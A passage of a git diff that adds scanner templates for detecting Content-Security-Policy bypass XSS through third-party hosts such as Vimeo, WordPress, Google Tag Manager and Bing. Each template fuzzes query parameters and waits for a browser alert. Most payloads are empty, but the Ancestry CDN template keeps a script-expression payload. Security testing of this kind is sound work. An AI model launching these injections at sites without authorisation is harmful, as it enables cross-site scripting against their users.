+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,vimeo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: vimeo_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "vimeo_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml
new file mode 100644
index 00000000000..3b61cc1b908
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: visitor-pixplug-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Pixplug Visitor
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,pixplug
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: visitor_pixplug_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "visitor_pixplug_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml
new file mode 100644
index 00000000000..19002ae5e5e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: visitor-service-tealiumiq-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via TealiumIQ Visitor Service
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,tealiumiq
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: visitor_service_tealiumiq_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "visitor_service_tealiumiq_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml
new file mode 100644
index 00000000000..55629180057
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: vk-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via VK API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,vk
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: vk_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "vk_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml
new file mode 100644
index 00000000000..cb01bd49eb5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wb-amap-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Amap WB
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,amap
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wb_amap_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wb_amap_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml
new file mode 100644
index 00000000000..cdfc3627cf1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: widget-usersnap-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Usersnap Widget
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,usersnap
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: widget_usersnap_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "widget_usersnap_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml
new file mode 100644
index 00000000000..7be61d69a52
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: widgets-pinterest-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Pinterest Widgets
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,pinterest
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: widgets_pinterest_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "widgets_pinterest_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml
new file mode 100644
index 00000000000..76d58cfbfa0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wikipedia-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Wikipedia API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,wikipedia
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wikipedia_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wikipedia_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml
new file mode 100644
index 00000000000..3ee7807ea53
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wordpress-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via WordPress API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,wordpress
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wordpress_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wordpress_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml
new file mode 100644
index 00000000000..7c030ec3b51
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wordpress-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via WordPress API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,wordpress
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wordpress_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wordpress_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml
new file mode 100644
index 00000000000..0333978a2a0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wse-api-here-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via HERE API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,here
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wse_api_here_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wse_api_here_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml
new file mode 100644
index 00000000000..900a228c344
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-ancestrycdn-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Ancestry CDN
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ancestrycdn
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - 'foo
{{ [1].reduce(value.alert, 1); }}
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_ancestrycdn_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_ancestrycdn_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml
new file mode 100644
index 00000000000..c2fd0c94538
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-api-ibm-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IBM API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ibm
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_api_ibm_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_api_ibm_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml
new file mode 100644
index 00000000000..7e27eecdcee
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-bing-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Bing API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,bing
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_bing_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_bing_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml
new file mode 100644
index 00000000000..5411b007ad8
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-blogger-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Blogger API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,blogger
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_blogger_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_blogger_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml
new file mode 100644
index 00000000000..7b735dabe0e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-google-analytics-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Analytics
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google-analytics
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_google_analytics_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_google_analytics_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..1e1c2f12c4b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-google-recaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google ReCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_google_recaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_google_recaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml
new file mode 100644
index 00000000000..5a5b7dd148b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-google-search-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Search
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_google_search_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_google_search_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml
new file mode 100644
index 00000000000..053304ed5fb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-googleapis-blogger-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google APIs Blogger
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,googleapis
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_googleapis_blogger_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_googleapis_blogger_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml
new file mode 100644
index 00000000000..bb1145a3aa3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-googleapis-customsearch-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google APIs Custom Search
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,googleapis
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_googleapis_customsearch_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_googleapis_customsearch_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml
new file mode 100644
index 00000000000..87824d5cf1e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-googletagmanager-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Tag Manager
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,googletagmanager
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_googletagmanager_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_googletagmanager_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml
new file mode 100644
index 00000000000..f5ecae7026f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-gstatic-angular-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via GStatic Angular
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_gstatic_angular_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_gstatic_angular_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..fa3430b3823
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-gstatic-recaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via GStatic ReCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
